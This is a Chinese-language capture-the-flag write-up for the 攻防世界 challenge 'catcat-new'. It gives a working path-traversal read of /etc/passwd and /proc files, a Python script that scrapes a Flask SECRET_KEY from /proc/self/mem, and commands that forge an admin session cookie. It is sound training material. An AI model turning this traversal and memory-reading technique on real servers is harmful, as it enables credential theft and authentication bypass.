【攻防世界】catcat-new
catcat-new
题目来源
攻防世界 NO.GFSJ1168
题解
dirsearch爆破目录,得到http://61.147.171.105:55027/admin
,没有有用信息
点开主页的图片,观察URL,尝试读取/etc/passwd
,成功,可以读取文件
读取/proc/self/cmdline
文件,发现有app.py
/proc/self/cmdline 是一个特殊的文件,它提供了当前进程的命令行参数。例如在kali的shell中读取该文件,则会返回 “zsh"
在上一级路径中读取到app.py
将bytes转换为字符串以便于阅读,得到以下代码
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat
flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")
@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)
@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)
通过源码可以看到,我们需要伪造session,让session里admin
的值为1,即可访问/admin
,拿到flag。要伪造session,我们需要拿到SECRET_KEY
,而SECRET_KEY
可以从内存数据中获取。
/proc/self/mem
中存储着当前进程在内存中的数据,但是该文件无法直接读取,我们需要先通过/proc/self/maps
文件得到内存映射地址,然后读取内存数据文件/proc/self/mem
。
将读到的maps
中的数据保存到test.txt
文件中,接下来使用脚本进行mem
数据的读取。
以下脚本是网上找到的,我只是添加了一些注释
import re
import requests
maps=open('test.txt') #test.txt存储/proc/self/maps的内容
b = maps.read()
list = b.split('\\n') #以换行符分行
for line in list:
if 'rw' in line: #寻找可读写的内存区域
addr = re.search('([0-9a-f]+)-([0-9a-f]+)',line)
#正则匹配地址,地址格式为十六进制数[0-9a-f],reserch会返回一个re.Match对象,用括号括起来是为了使用group()处理返回结果。
#由于每一行会有两个地址,表示一个内存区域,因此addr会有group(1)和group(2)
start = int(addr.group(1),16) #将十六进制字符转化为十进制数,为了符合start参数格式参考链接
end = int(addr.group(2),16) #将十六进制字符转化为十进制数,为了符合end参数格式
#这里start和end参数是python读取/proc/self/mem需要用到的参数
print(start,end)
url = f"http://61.147.171.105:55174//info?file=../../../proc/self/mem&start={start}&end={end}"
#使用start和end参数读取mem
response = requests.get(url)
secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", response.text) #uuid4()生成的字符串除去-符号后为固定的32字节(128bit),*abcdefgh为题目源码生成uuid后添加的字符串
if secret_key:
print(secret_key)
break
在app.py
中可以看到info
路由中除了file
参数,还有start
和end
参数,这两个参数就是用来传递读取mem
数据时内存区域对应的地址。
运行脚本得到secret_key
:8fe482ecf92b4639801ca7312cf5f73a*abcdefgh
使用工具flask_session_cookie_manager伪造session。项目地址:https://github.com/noraj/flask-session-cookie-manager
伪造ssesion需要一个正确的session,将其解密,更改数据后再进行加密
解密
python flask_session_cookie_manager3.py decode -s “secret_key” -c “session”
加密
python flask_session_cookie_manager3.py encode -s “secret_key” -t “data”
获取session值:eyJhZG1pbiI6MH0.Zl1XPA.8KjQ87LqcrnMb34jRHFIB_il4Y0
伪造session,根据app.py
将数据中admin的值改为1
接下来使用伪造的session代替原来的session,访问路由admin
,得到flag